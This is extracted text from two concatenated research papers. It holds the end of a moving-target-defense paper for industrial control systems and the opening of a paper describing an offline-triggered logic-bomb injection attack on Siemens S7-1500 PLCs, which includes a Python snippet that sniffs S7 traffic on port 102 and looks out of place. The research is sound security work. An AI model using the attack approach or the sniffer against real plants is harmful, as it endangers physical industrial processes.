Also, a model can provide information about the sensitivity of the system to certain frequencies, or can be used to reverse engineer the control algorithm. In order to illustrate how the MTD-IDR can limit the model estimation capabilities of the attacker, three common system identification methods are tested, namely, autoregressive (ARX) models, transfer function estimation, and state-space estimation. Each of these methods possesses a specific structure, whose unknown parameters are estimated by minimizing the mean square error (MMSE) with respect to the collected data. The data are obtained from the two sensors and two control commands of the QTP during normal operation. According to Theorem 1, the probabilities that the adversary will receive new data from the sensor and control signals are $p_{T_s}=[1, 0.533]$ and $p_{T_u}=[0.5714, 0.667]$, respectively. We assume that when the information is not transmitted due to the replica activation algorithm, the adversary uses the previous data.

Fig. 5. Attacker's system estimation of level sensor 1 for different model estimation strategies: (a) with the proposed MTD and (b) without MTD.

TABLE I. Attacker's estimation accuracy with and without MTD.

Table I and Fig. 5 show the model estimation accuracy with and without the proposed MTD-IDR. Clearly, having incomplete data affects the attacker's estimation capacity.

C. Decreasing the Impact of Successful Attacks

The second uncertainty layer helps to limit successful FDI attacks on sensors and control commands. An attacker is assumed to gain access to sensor and control commands simultaneously and to inject a bias attack. Fig. 6(a) depicts the water level deviation in all tanks without MTD and with a bias attack $\delta_y=[1,\ 1]^{\top}$ and $\delta_u=[1,\ 1]^{\top}$. The bias attack causes a significant deviation of the water level. On the other hand, with the proposed MTD-IDR, we assume the attacker gains access to one replica per sensor and one replica per control command (i.e., gains access to four replicas in total). Due to the random nature of the MTD, 25 experiments were performed starting from the same initial conditions. Fig. 6(b) shows the Monte Carlo simulation of the water level. Note that the impact of the attack is significantly smaller than without MTD.

Fig. 6. (a) Deviation in the water level caused by a bias attack that affects the sensor signals and control commands without MTD. (b) The proposed MTD-IDR significantly limits the water level deviation. (c) Norm of the water level of all tanks without MTD, with MTD-IDR, and with the E-MTD proposed in [21]. The MTD-IDR outperforms E-MTD by guaranteeing faster convergence and larger attack limitation.

The MTD-IDR is compared with the entropy-based MTD (E-MTD) mechanism proposed in [21]. The E-MTD approach consists of switching among different combinations of actuators and sensors in order to increase the uncertainty perceived by an adversary. The E-MTD requires carefully selecting the switching probabilities and switching instants in order to guarantee system stability. Fig. 6(c) depicts the norm of the water level at each time instant, i.e., $\|x(t)\|$, using both MTD strategies. The switching probabilities of the E-MTD are chosen to be equal to $p_{T_s}$ and $p_{T_u}$, such that both MTD strategies provide the same level of uncertainty. The MTD-IDR does not affect the performance of the system before the attack, contrary to the E-MTD, which induces a larger convergence time and undesired disturbances during normal operation.
In addition, MTD-IDR provides stronger security guarantees by significantly reducing the impact caused by cyberattacks on the water level deviation.

Fig. 7(a) depicts the impact of the attack [i.e., $\mathrm{tr}(Q)$], which is proportional to the volume of the attacker's reachable set, with respect to the total number of replicas. By having five replicas for the sensors and five for the control commands, the impact is reduced by around 87%. Therefore, MTD-IDR can significantly limit the attacks with a low investment in IoT devices. On the other hand, the random replica activation algorithm not only helps to limit the attacker's learning capabilities but also has considerably lower bandwidth consumption by not transmitting all the replicated information simultaneously, as illustrated in Fig. 7(b), where the total bandwidth consumption changes over time but rarely uses the maximum capacity. Moreover, having intermittent data transmission also decreases the energy consumption, enhancing the scalability and feasibility of the MTD-IDR framework.

Fig. 7. (a) Impact of the attack ($\mathrm{tr}(Q)$) and (b) bandwidth consumption for different numbers of available replicas. Straight lines represent the expected bandwidth consumption, and $n_T=n_{sT}+n_{uT}$.

TABLE II. Comparison of different MTD mechanisms.

Table II summarizes the performance of the proposed MTD-IDR when compared with two existing MTD mechanisms: 1) E-MTD and 2) the sensor-switching MTD (SS-MTD) introduced in [19], for the bias attack described above. For all approaches, the offline computation time, latency, impact reduction, performance degradation, and average data availability are computed. The offline computation time is calculated based on the time it takes to compute the desired probabilities at which signals should switch. The E-MTD requires solving four Riccati equations, one for each sensor and each actuator; for the SS-MTD it is necessary to solve a nonconvex nonlinear optimization problem; and for the proposed MTD-IDR it is necessary to solve Problem 1. The results are obtained using MATLAB on a computer with an Intel Core i7-8550U CPU @ 1.80-1.99 GHz and 32 GB of RAM. The offline computation time of the E-MTD is significantly lower since there are many efficient algorithms to solve Riccati equations. The MTD-IDR and SS-MTD need to solve more complex optimization problems. However, the solution only needs to be found once, which does not affect the system operation.

Network latency corresponds to the time it takes for all sensor and control signals to be replicated, sent, and received using the DDS databus (i.e., publish and subscribe). A detailed latency analysis was performed in [40]. Based on this analysis, for our case study with ten replicas, the network latency is approximately 0.27 ms with a transmission rate of 100 msg/s and a message size of approximately 326 bytes. Therefore, DDS
does not induce a significant latency that can affect the system operation. For E-MTD and SS-MTD, the authors did not provide any implementation results that illustrate the actual overhead of their solutions. The impact reduction is computed by comparing the steady-state norm after the bias attack with and without MTD. The performance degradation is calculated based on the cumulative deviation of the states, $\int_{0}^{\infty}\|x(\tau)\|\,d\tau$, with respect to the case without MTD. Note that the MTD-IDR achieves a significant impact reduction without any performance degradation, while for the other cases the performance degradation is large when compared to their benefit in improving security. Finally, the average data availability is computed as the number of sensor data samples received by the controller with respect to the total number of data samples. Note that the MTD-IDR is the only one that guarantees 100% data availability, while the other MTD approaches can only guarantee below 80%. For this particular case study, the stability of the system is not affected even when data are not always available; however, other industrial systems can be severely affected when the data availability is below 99%.

V. CONCLUSION

This article presented the novel MTD-IDR framework, which utilizes IoT-enabled data replication for MTD in CPSs. MTD-IDR utilizes linear matrix inequalities to formulate an optimization problem for selecting the optimal number of replicas for each communicated signal in the system. Two algorithms were introduced that add two layers of uncertainty for attackers. The experimental results, carried out in a real-time environment using the quadruple-tank process and a data-centric replication architecture, showed that MTD-IDR significantly reduces the attacker's accuracy in learning the system's model, and therefore hinders the creation of stealthy attacks. Furthermore, it drastically reduced the impact of successful FDI attacks on the physical system and it outperformed the E-MTD strategy without degrading the normal system performance. In particular, the results showed that, with five replicas distributed among the two sensors and five replicas allocated among the two control command signals, it is possible to reduce the attack impact by about 87%. Additionally, MTD-IDR does not affect the stability or performance of the controlled CPS, therefore leaving the nominal operation of the physical system unaltered. The results also illustrated the scalability and seamless integration of the proposed IoT-enabled replication approach obtained with the data-centric architecture. Moreover, the random replica activation reduces the overall bandwidth and energy consumption given that only a subset of replicas transmits data simultaneously.

While MTD-IDR proved effective for enhancing the security and resiliency of CPSs against FDI attacks, future directions include optimizing network resources (e.g., dynamic bandwidth allocation) by incorporating metrics from the communication network into the constraints of Problem 1, and extending the random path selection algorithm to include anomaly detection and removal of malicious data.

REFERENCES

[1] J. Giraldo, E. Sarkar, A. A. Cardenas, M. Maniatakos, and M. Kantarcioglu, "Security and privacy in cyber-physical systems: A survey of surveys," IEEE Design & Test, vol. 34, no. 4, pp. 7–17, Aug. 2017.
[2] A. Humayed, J. Lin, F. Li, and B. Luo, "Cyber-physical systems security: A survey," IEEE Internet Things J., vol. 4, no. 6, pp. 1802–1831, Dec. 2017.
[3] 2019 Year in Review: ICS Vulnerabilities, Dragos, Hanover, MD, USA, 2019.
[4] Defense Use Case, Analysis of the Cyber Attack on the Ukrainian Power Grid, vol. 388, Electricity Inf. Sharing Anal. Center (E-ISAC), Washington, DC, USA, 2016.
[5] "Security: First-of-a-Kind U.S. Grid Cyberattack Hit Wind, Solar," 2019. [Online].
Available: https://www.eenews.net/stories/1061421301
[6] M. Uma and G. Padmavathi, "A survey on various cyber attacks and their classification," Int. J. Netw. Security, vol. 15, no. 5, pp. 390–396, 2013.
[7] R. E. Navas, F. Cuppens, N. B. Cuppens, L. Toutain, and G. Z. Papadopoulos, "MTD, where art thou? A systematic review of moving target defense techniques for IoT," IEEE Internet Things J., vol. 8, no. 10, pp. 7818–7832, May 2021.
[8] C. Lei, H.-Q. Zhang, J.-L. Tan, Y.-C. Zhang, and X.-H. Liu, "Moving target defense techniques: A survey," Security Commun. Netw., vol. 2018, Jul. 2018, Art. no. 3759626.
[9] M. Torquato and M. Vieira, "Moving target defense in cloud computing: A systematic mapping study," Comput. Security, vol. 92, May 2020, Art. no. 101742.
[10] F. Nizzi, T. Pecorella, F. Esposito, L. Pierucci, and R. Fantacci, "IoT security via address shuffling: The easy way," IEEE Internet Things J., vol. 6, no. 2, pp. 3764–3774, Apr. 2019.
[11] B. Potteiger, Z. Zhang, and X. Koutsoukos, "Integrated data space randomization and control reconfiguration for securing cyber-physical systems," in Proc. 6th Annu. Symp. Hot Topics Sci. Security, 2019, pp. 1–10.
[12] B. Potteiger, Z. Zhang, and X. Koutsoukos, "Integrated moving target defense and control reconfiguration for securing cyber-physical systems," Microprocess. Microsyst., vol. 73, Mar. 2020, Art. no. 102954.
[13] A. C. Pappa, A. Ashok, and M. Govindarasu, "Moving target defense for securing smart grid communications: Architecture, implementation & evaluation," in Proc. IEEE Power Energy Soc. Innov. Smart Grid Technol. Conf. (ISGT), Washington, DC, USA, 2017, pp. 1–5.
[14] S. Woo, D. Moon, T.-Y. Youn, Y. Lee, and Y. Kim, "CAN ID shuffling technique (CIST): Moving target defense strategy for protecting in-vehicle CAN," IEEE Access, vol. 7, pp. 15521–15536, 2019.
[15] Z. Zhang, R. Deng, D. K. Y. Yau, P. Cheng, and J. Chen, "Analysis of moving target defense against false data injection attacks on power grid," IEEE Trans. Inf. Forensics Security, vol. 15, pp. 2320–2335, 2020.
[16] B. Liu and H. Wu, "Optimal D-FACTS placement in moving target defense against false data injection attacks," IEEE Trans. Smart Grid, vol. 11, no. 5, pp. 4345–4357, Sep. 2020.
[17] S. Lakshminarayana, E. V. Belmega, and H. V. Poor, "Moving-target defense against cyber-physical attacks in power grids via game theory," IEEE Trans. Smart Grid, vol. 12, no. 6, pp. 5244–5457, Nov. 2021.
[18] M. Higgins, F. Teng, and T. Parisini, "Stealthy MTD against unsupervised learning-based blind FDI attacks in power systems," IEEE Trans. Inf. Forensics Security, vol. 16, pp. 1275–1287, 2020.
[19] J. Giraldo, A. Cardenas, and R. G. Sanfelice, "A moving target defense to detect stealthy attacks in cyber-physical systems," in Proc. Amer. Control Conf. (ACC), Philadelphia, PA, USA, 2019, pp. 391–396.
[20] J. Giraldo and A. A. Cardenas, "Moving target defense for attack mitigation in multi-vehicle systems," in Proactive and Dynamic Network Defense. Cham, Switzerland: Springer Int., 2019, pp. 163–190.
[21] A. Kanellopoulos and K. G. Vamvoudakis, "A moving target defense control framework for cyber-physical systems," IEEE Trans. Autom. Control, vol. 65, no. 3, pp. 1029–1043, Mar. 2020.
[22] J. Tian, R. Tan, X. Guan, Z. Xu, and T. Liu, "Moving target defense approach to detecting Stuxnet-like attacks," IEEE Trans. Smart Grid, vol. 11, no. 1, pp. 291–300, Jan. 2020.
[23] P. Griffioen, S. Weerakkody, and B. Sinopoli, "A moving target defense for securing cyber-physical systems," IEEE Trans. Autom.
Control, vol. 66, no. 5, pp. 2016–2031, May 2021.
[24] A. O. Hariri, M. El Hariri, T. Youssef, and O. A. Mohammed, "A bilateral decision support platform for public charging of connected electric vehicles," IEEE Trans. Veh. Technol., vol. 68, no. 1, pp. 129–140, Jan. 2019.
[25] Data Distribution Service (DDS). [Online]. Available: https://www.omg.org/omg-dds-portal/ (accessed Sep. 22, 2020).
[26] Y. Xu, Y. Yang, T. Li, J. Ju, and Q. Wang, "Review on cyber vulnerabilities of communication protocols in industrial control systems," in Proc. IEEE Conf. Energy Internet Energy Syst. Integr. (EI2), Beijing, China, 2017, pp. 1–6.
[27] Z. Drias, A. Serhrouchni, and O. Vogel, "Taxonomy of attacks on industrial control protocols," in Proc. Int. Conf. Protocol Eng. (ICPE) Int. Conf. New Technol. Distrib. Syst. (NTDS), Paris, France, 2015, pp. 1–6.
[28] R. M. Abdulghani, M. M. Alrehili, A. A. Almuhanna, and O. H. Alhazmi, "Vulnerabilities and security issues in IoT protocols," in Proc. 1st Int. Conf. Smart Syst. Emerg. Technol. (SMARTTECH), Riyadh, Saudi Arabia, 2020, pp. 7–12.
[29] D. E. Seborg, D. A. Mellichamp, T. F. Edgar, and F. J. Doyle III, Process Dynamics and Control. Hoboken, NJ, USA: Wiley, 2010.
[30] F. Auger, M. Hilairet, J. M. Guerrero, E. Monmasson, T. Orlowska-Kowalska, and S. Katsura, "Industrial applications of the Kalman filter: A review," IEEE Trans. Ind. Electron., vol. 60, no. 12, pp. 5458–5471, Dec. 2013.
[31] C. Murguia, I. Shames, J. Ruths, and D. Nešić, "Security metrics and synthesis of secure control systems," Automatica, vol. 115, May 2020, Art. no. 108757.
[32] R. M. Freund, "Introduction to semidefinite programming (SDP)," Dept. Electr. Eng. Comput. Sci., Massachusetts Inst. Technol., Cambridge, MA, USA, Rep., 2009. [Online]. Available: https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-251jintroduction-to-mathematical-programming-fall-2009/readings/MIT6_251JF09_SDP.pdf
[33] P. Bonami et al., "An algorithmic framework for convex mixed integer nonlinear programs," Discrete Optim., vol. 5, no. 2, pp. 186–204, 2008.
[34] L. Su, L. Tang, D. E. Bernal, and I. E. Grossmann, "Improved quadratic cuts for convex mixed-integer nonlinear programs," Comput. Chem. Eng., vol. 109, pp. 77–95, Jan. 2018.
[35] K. H. Johansson, "The quadruple-tank process: A multivariable laboratory process with an adjustable zero," IEEE Trans. Control Syst. Technol., vol. 8, no. 3, pp. 456–465, May 2000.
[36] M. Ram, Ed., "Sliding mode robust control approaches for robust control of quadruple tank system," in Mathematics in Engineering Sciences: Novel Theories, Technologies, and Applications. Boca Raton, FL, USA: CRC Press, 2019.
[37] G. Park, C. Lee, and H. Shim, "On stealthiness of zero-dynamics attacks against uncertain nonlinear systems: A case study with quadruple-tank process," in Proc. Int. Symp. Math. Theory Netw. Syst. (ISMTNS), 2018, pp. 10–17.
[38] J. Lofberg, "YALMIP: A toolbox for modeling and optimization in MATLAB," in Proc. IEEE Int. Conf. Robot. Autom., Taipei, Taiwan, 2004, pp. 284–289.
[39] RTI: The Largest Software Framework Provider for Smart Machines and Real-World Systems. [Online]. Available: www.rti.com (accessed Sep. 22, 2020).
[40] T. A. Youssef, M. El Hariri, A. T. Elsayed, and O. A.
Mohammed, "A DDS-based energy management framework for small microgrid operation and control," IEEE Trans. Ind. Informat., vol. 14, no. 3, pp. 958–968, Mar. 2018.

Jairo A. Giraldo (Member, IEEE) received the B.S. degree in electronic engineering from the National University of Colombia, Manizales, Colombia, in 2010, and the M.S. and Ph.D. degrees from the Universidad de los Andes, Bogota, Colombia, in 2012 and 2015, respectively. He is currently a Research Assistant Professor with the Department of Electrical and Computer Engineering, The University of Utah, Salt Lake City, UT, USA. His research interests include security and privacy in cyber-physical systems, multiagent systems, and distributed control for smart grid.

Mohamad El Hariri (Member, IEEE) received the Ph.D. degree in electrical and computer engineering from Florida International University, Miami, FL, USA, in 2018. He is currently an Assistant Professor of Renewable Energy Systems with the Electrical Engineering Department, Colorado School of Mines, Golden, CO, USA. His research interests include secure control and operation of critical infrastructures, such as energy systems, transportation, and communication networks, as well as power system electronics, interconnection of renewable energy, and Internet of Things applications in smart grid.

Masood Parvania (Senior Member, IEEE) received the Ph.D. degree in electrical engineering from Sharif University of Technology, Tehran, Iran, in 2013. He is the Director of the Utah Smart Energy Laboratory and an Associate Professor of Electrical and Computer Engineering with the University of Utah, Salt Lake City, UT, USA. His research interests include the operation, economics, and resilience of power and energy systems, and modeling and operation of interdependent critical infrastructures. Dr. Parvania serves as an Associate Editor of the IEEE Transactions on Smart Grid, the IEEE Transactions on Power Systems, and the IEEE Transactions on Sustainable Energy. He is the Chair of the IEEE Power and Energy Society Utah Chapter, the IEEE PES Bulk Power Systems Operation Subcommittee, and the IEEE PES Risk, Reliability, and Probability Applications Subcommittee.
A_New_Injection_Threat_on_S7-1500_PLCs_-_Disrupting_the_Physical_Process_Offline.pdf
Programmable Logic Controllers (PLCs) are increasingly connected and integrated into the Industrial Internet of Things (IIoT) for better network connectivity and a more streamlined control process. In practice, however, this also brings security challenges and exposes them to various cyber-attacks targeting the physical process controlled by such devices. In this work, we investigate whether the newest S7 PLCs are vulnerable by design and can be exploited. In contrast to the typical control logic injection attacks reported in the research community, which require adversaries to be online throughout the ongoing attack, this article introduces a new exploit strategy that aims at disrupting the physical process controlled by the infected PLC while adversaries are connected neither to the target nor to its network at the point zero of the attack. Our exploit approach comprises two steps: 1) patching the PLC with a malicious Time-of-Day interrupt block once an attacker gains access to an exposed PLC, and 2) triggering the interrupt at a later time of the attacker's choosing, when he is disconnected from the system's network. For a realistic attack scenario, we implemented our attack approach on a Fischertechnik training system based on an S7-1500 PLC using the latest version of the S7CommPlus protocol. Our experimental results showed that we could keep the patched interrupt block in idle mode, hidden in the PLC memory for a long time without being revealed, before being activated at the specific date and time that the attacker defined. Finally, we suggest some potential security recommendations to protect industrial environments from such a threat.
Received 6 December 2021; revised 22 January 2022; accepted 6 February 2022. Date of publication 14 February 2022; date of current version 2 March 2022. The review of this paper was arranged by Associate Editor Yang Shi. Digital Object Identifier 10.1109/OJIES.2022.3151528

A New Injection Threat on S7-1500 PLCs - Disrupting the Physical Process Offline

WAEL ALSABBAGH 1,2 (Member, IEEE), AND PETER LANGENDÖRFER 1,2

1 IHP Leibniz-Institut für innovative Mikroelektronik, 15236 Frankfurt (Oder), Germany
2 Brandenburg University of Technology Cottbus-Senftenberg, 03046 Cottbus, Germany

CORRESPONDING AUTHOR: WAEL ALSABBAGH (e-mail: [email protected])

This work was supported by the Open Access Fund of the Leibniz Association.

INDEX TERMS: Programmable logic controllers, industrial control systems, injection attack, time-of-day block, offline attack.

I. INTRODUCTION

Industrial Control Systems (ICSs) are used to automate critical control processes such as production lines, electrical power grids, oil and gas facilities, petrochemical plants, and others. Each ICS environment consists of two main sites: a control site and a field site. Fig. 1 shows a typical ICS environment. The control center runs ICS services such as Human Machine Interfaces (HMIs) and engineering workstations. The field site has sensors, actuators, and Programmable Logic Controllers (PLCs) that are installed locally to monitor and control physical processes. The engineering workstation is used to configure and program PLCs. It has PLC vendor-specific programming software to write the control logic that defines how the PLC should control and maintain the physical process at a desired state. PLCs are offered by several vendors such as Siemens, Allen-Bradley, Mitsubishi, Schneider and Modicon. Each has its own proprietary firmware, programming language, communication protocols and maintenance software.

FIG. 1. An example of an industrial control system environment.

In the past, when PLCs were first introduced, it was uncommon for them to be connected to the outer world and they were often running independently, i.e., the PLC-based ICS environments were air-gapped. This separation is no longer possible due to new demands such as maximizing profits, minimizing costs, and achieving better efficiency [1]. Therefore, it is not surprising that most modern ICS environments are increasingly connected to corporate networks and no longer controlled/monitored on-site. Unfortunately, this higher connectivity has also enlarged the attack surface and brought its own security challenges, allowing attacks that did not exist in the times of air-gapped industrial plants. Stuxnet [12], which targeted the Iranian uranium enrichment in 2010, played an important role in increasing awareness of security for industrial control systems. This attack showed that no plant is resilient to cyber-attacks and that PLCs could potentially be hacked, causing disastrous damage. Since then, several other ICSs have been successfully attacked, for example the Ukrainian power grid [17], the German steel mill [22], TRITON [16], etc. In this work, we show that modern PLC-based ICS environments are not fully protected against control logic injection attacks, and that these systems are still quite far from being completely secure.
To this end, we present a new attack strategy that allows malicious adversaries to disrupt the physical process controlled by PLCs offline, i.e., without being connected to the target or to its network at the point zero of the attack. The main focus of our investigations is on Siemens devices, precisely the latest PLC models, i.e., devices from the S7-1500 family, and the latest version of the S7CommPlus protocol, i.e., S7CommPlusV3. Our attack approach is structured into two main phases:

1) Patching the control logic program of a PLC with an interrupt, precisely with a Time-of-Day (ToD) interrupt block using the specific Organization Block 10 (OB10). This is done online, i.e., when the adversary has access to the target device. During this phase, the patch has no impact, neither on the physical process nor on the execution of the control logic program, i.e., the patch is in idle mode.

2) Activating the patch injected in the target later, at a certain date and time. This is done offline, i.e., without the need of being connected to the target PLC at the point zero of the attack.

To conduct experiments proving the research, a Fischertechnik training industry plant1 controlled by an S7-1500 PLC was used to test our attack approach. Our new threat is network based, and can be successfully conducted by any attacker with network access to any S7-1500 PLC with firmware V2.9.2 or lower.

A. MOTIVATION

The objective of this article is to introduce a new control logic injection attack on cryptographically secured PLCs that use sophisticated protection methods. The intention of discussing this new type of attack is to raise awareness of sophisticated attacks and to assist in determining new vulnerabilities and weaknesses existing in PLCs, as they are running in millions of critical industrial plants and are a major point of interaction between the cyber and physical worlds. Our main focus is to understand the attack vectors in the first place, and to show the security research community, engineers, and industrial vendors what the consequences of the vulnerabilities would be if they were exploited. To conduct a real-world attack scenario, we chose a device from the Siemens S7-1500 family. Our selection is based on two factors. First, Siemens is the leading provider of industrial automation components and their SIMATIC families hold approximately 30-40% of the industry market [23]-[25]. Secondly, Siemens claimed that its newest PLC generation is well secured against various attacks, and their newly developed S7CommPlus protocol supports improved security measures like an advanced anti-replay mechanism and a sophisticated integrity check. These two factors motivated us to show how the most secure PLCs in the Siemens SIMATIC lines can be exploited by external adversaries, and how attackers can confuse the physical process even without being connected to the victim devices. This could lead to disastrous damage to the plants employing such compromised devices. The major benefit of our attack strategy is that the time of running the attack and the point in time when it shall hit the victim can be fully decoupled.

1 https://www.fischertechnikwebshop.com/de-DE/fischertechnik-lernfabrik-4-0-24v-komplettset-mit-sps-s7-1500-560840-de-de
For example, if motivated adversaries want to collapse a certain system at a speci c date/time e.g., the day before elections, or the day before going to the stock market to harm a country or a company respectively, they have suf cient time to inject their malicious code very well in advance, and do not need to be successful with the attack just at the right time. B. PROBLEM STATEMENT Most of the injection attacks have two critical challenges: First is that the typical injection attacks are designed to gain access to the target or its network in very speci c circumstances i.e., when the security measure implemented is absent or disabled for a certain reason [2], [3], [5] [7], [9] [11], [13], [18], [29], [30], [34] for example, the security mean is being updated, the ICS operator is running some maintenance processes, other devices are being removed/replaced/added to the network, etc. The system is at high risk to get a malicious infection during these critical phases, but it is not operating in its normal state i.e., the physical process is more likely to be temporally off. Hence, if attackers manage successfully to gain access to the target device during these times, and perform their attacks right after that, they will, pretty likely, not impact the physical process. The second challenge is that after the ICS operator is done with the ongoing maintenance processes, he usually reactivates the security measure before re-operating the sys- tem once again. This allows him to reveal and prevent any attempt to inject the PLC if the attacker is still connected to the network. Our attack approach overcomes both challenges by patching the PLC with a malicious block at that point in time at which the attacker accesses the network success- fully, keeping the infection hidden in the PLC s memory, and lunching the attack at a later time on his will. This ensures that the attack is not being performed when the system is not operating normally or being detected by an introduced or reactivated security measure. It is also important to highlight that ICS operators are still able to reveal any infection or modi cation in the control logic program, by uploading and comparing both programs the one running on the PLC and the one running in the engineering software [10]. In this article, we also overcome this challenge by exploiting a vulnerability existing in the newest S7CommPlus protocol (explained in Section V) to hide the infection from the ICS operator i.e., who will always be shown the original code that runs on his engineering software whilst the PLC runs the attacker s code.C. ATTACKER MODEL Assumption: Our attacker model assumes that an attacker has access to the level-3 network of the Purdue Model2(i.e., control center network). This assumption is based on real- world ICS attacks e.g., TRITON [16] and Ukraine power grid attack [17] that gained access to the control center via a typical IT attack vector such as infected USB stick and social engineering attack. We also assume that the attacker has access to the PLC and its respective engineering software along with a packet-snif ng tool such as Wireshark.3After the level-3 network access, an attacker can make use of software and libraries to communicate with the target PLC over the network. As our assumptions have already been reported to hold true in reports on real world attacks, we are convinced that our attack is a realistic one. 
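The eavesdropping part of this model does not require special tooling beyond what is already assumed (Wireshark or a packet-sniffing library). As a minimal sketch, the following Scapy script passively logs ISO-on-TCP traffic (TCP port 102, the transport used by S7comm/S7CommPlus) as seen from the level-3 network; the interface name is a placeholder, and the attacker is assumed to already see the PLC-Portal path, e.g. via a mirror port or a man-in-the-middle position.

```python
# Minimal sketch: passively observing S7 traffic from the level-3 network.
# The interface name is a placeholder; the S7CommPlus payload is not decoded here.
from scapy.all import sniff, TCP, IP

S7_TCP_PORT = 102  # ISO-on-TCP port used by S7comm/S7CommPlus

def log_s7_packet(pkt):
    if pkt.haslayer(TCP) and pkt.haslayer(IP):
        payload = bytes(pkt[TCP].payload)
        print(f"{pkt[IP].src}:{pkt[TCP].sport} -> "
              f"{pkt[IP].dst}:{pkt[TCP].dport}  {len(payload)} bytes")

# BPF filter keeps only ISO-on-TCP traffic; store=False avoids buffering everything.
sniff(filter=f"tcp port {S7_TCP_PORT}", prn=log_s7_packet, store=False, iface="eth0")
```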
Attacker s goal: The attacker s goal is as follows: disrupting the physical process at a time when he is completely of ine, i.e., without being connected to the target or its network at the point zero for the attack, while the physical process of the target network is controlled by the infected PLC. In order to ensure achieving the overall goal, the injection may not be revealed by the ICS operator in the time between infecting the PLC and the attack launch date. In this work, we assume that an attacker achieves these goals if the following three tasks are accomplished: 1) patching the malicious code when the attacker is con- nected to the target s network. 2) keeping this infection hidden in the PLC s memory without being revealed. 3) disrupting the physical process at a later time when the attacker is completely of ine of the target s network. Attacker s capabilities: The attacker can employ one or more of these capabilities to achieve the goals mentioned earlier: 1) Eavesdropping: read any messages between two com- municating parties. 2) Fabrication: initiate conversation with any other party and compose/send a new message. 3) Interception: intercept messages, and block or mod- ify/resend them. D. CONTRIBUTIONS In this article, we take the attack approach presented in our former paper [10] one step further in the direction of ex- ploiting PLCs of ine, and extend our experiences to involve the modern S7-1500 PLCs that use S7CommPlusV3 protocol. Our main contributions in this article are summarized as fol- lows: 1) Extending our control logic injection attack approach presented in [10] from S7-300 to S7-1500 PLCs. 2) Hiding the malicious interrupt code in the PLC s mem- ory until the very moment determined by the attacker. 2https://www.goingstealthy.com/the-ics-prude-model/ 3https://www.wireshark.org/ 148 VOLUME 3, 2022 3) Disrupting the physical process controlled by the com- promised PLC of ine i.e., when the attacker is not con- nected to the target or its network. 4) Demonstrating our attack using a real Siemens S7- 1512SP controlling a Fischertechnik training factory. 5) Revealing two new vulnerabilities in the integrity protection method that S7-1500 PLCs and their S7CommPlus protocol use. The rest of this work is organized as follows. Section II provides an overview of control logic injection attacks and related work. Section III presents the technical background, followed by the description of the protection mechanism of the latest S7CommPlus protocol in Section IV. Our attack approach is presented and explained in details in Section V. In Section VI, we evaluate and discuss the impact of our attack, as well as suggest some possible mitigation methods. Finally, we conclude our work in Section VII. II. OVERVIEW AND RELATED WORK One of the recent threats targeting ICSs is the control logic in- jection attack. Such an attack involves modifying the original control logic running on a target PLC by engaging its engi- neering software, typically employing the man-in-the-middle approach [3] [5], [9], [10], [13], [30] [32]. The main vulnera- bility exploited in this type of attacks is the lack of authentica- tion measures in the PLC protocols. ICS vendors responded to this threat by providing their PLCs with passwords to protect the control logic from unauthorized access i.e., whenever an ICS supervisor attempts to access the control logic running in a PLC, the device rst requires an authentication to allow him to read/write the code. 
This is normally done via propri- etary authentication protocol. But, this solution is not fully preventing the controllers from being compromised. Previous academic efforts [2] [5], [9], [35] managed successfully to bypass the authentication and to access the control logic in different password-protected PLCs. The authors of the above- mentioned papers discussed two prime ways to bypass the authentication: either by extracting the hash of the password and then pushing it back to the PLC (known as a replay attack), or using a representative list of plain-text password, encoded-text password pairs to brute-force each byte of ine. Overall, protecting the control logic by password authenti- cation only failed. Attackers are still capable of accessing the PLCs program and manipulating the physical processes controlled by the exposed devices. In the research community there are two types of control logic injection attacks: traditional control logic injection and rmware injection. However, infecting a PLC rmware would be a challenging task in a real ICS environment as most PLC vendors protect their PLCs from unauthorized rmware updates by cryptographic methods e.g., digital signature, or allowing rmware updates only by local access (e.g., SD cards and USB). This work does not cover a rmware injection and only focuses on the traditional control logic injection attack. In the following, we classify the existing injection attacks aiming at disrupting the physical process into two groups. FIG. 2. Disrupting the physical process online. A. DISRUPTING THE PHYSICAL PROCESS ONLINE The attacks in this group are designed to modify the original control logic program by engaging its engineering software. The physical process controlled by the infected device is im- pacted right after the malicious code is successfully injected. Fig. 2 shows the attack sequence. The most well-known attack representing this kind is the one that was conducted on Iranian nuclear facilities in 2010, named as Stuxnet to sabotage centrifuges at a uranium enrich- ment plant. The Stuxnet attack [12], [20], [21] used a windows PC to target Siemens S7-300 and S7-400 PLCs that were con- nected to variable frequency drives. It infects the control logic of the PLCs to monitor the frequency of the attached motors, and launches an attack if the frequency is within a certain range (i.e., 807 Hz and 1,210 Hz). More recent examples of such attacks on ICS occurred in Ukraine [17], [19]. These attacks targeted the electrical distribution grid causing wide- spread blackouts. In 2014, the German federal of ce for infor- mation security also announced a cyber-attack at an unnamed steel mill [22]. The hackers manipulated and disrupted control systems to such a degree that a blast furnace could not be properly shot down, resulting in a massive damage. McLaugh- lin [45] conducted a control logic injection attack on a train interlocking program. The malicious program he introduced was reverse engineered using a format program. With the help of the decompiled program, he extracted the eld-bus ID that indicated the PLC vendor and model, and then retrieved clues about the process structure and operations. Afterwards he designed his own program that generates unsafe behaviors for the train e.g., causing con ict states for the train signals. As a real attack scenario, he targeted timing-sensitive signals and switches. In a follow up work, McLaughlin et al. [46] implemented SABOT. 
It required a high-level description of the physical process, for example, the plant contains two in- gredient valves and one drain valve . Such information could be got from public channels, and are similar for processes in the same industrial sector. With this information, SABOT generates a behavioral speci cation for the physical processes and used incremental model checking to search for a mapping between a variable within the program, and a speci ed physi- cal process. Using this map, SABOT compiled a dynamic pay- load customized for the physical process. Both studies were limited to Siemens PLCs, without illustrating many details on reverse engineering. Valentine [48] introduced attacks that could install a jump to a subroutine command, and modify the interaction between two or more ladders in a program. This could be disguised as an erroneous use of scope and linkage by a novice programmer. In 2015, Klick et al. [6] VOLUME 3, 2022 149 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE presented the injection of malware into the control logic of a SIMATIC PLC, without disrupting the service. The authors showed that a knowledgeable adversary with access to a PLC can download and upload code to it, as long as the code consists of MC7 bytecode. In a follow on work, Spenneberg et al. [7] introduced a PLC worm. The worm spreads inter- nally from one PLC to other target PLCs. During the infection phase, the worm scans the network for new target PLCs. A Ladder Logic Bomb malware written in ladder logic or one of the compatible languages was introduced in [8]. Such a malware is inserted by an attacker into existing control logic on PLCs. A group of researchers [9] demonstrated a remote attack on the control logic of PLCs. They were able to infect the PLC and to hide the infection from the engineering soft- ware at the control center. They implemented their attack on Schneider Electric Modicon M221, and its 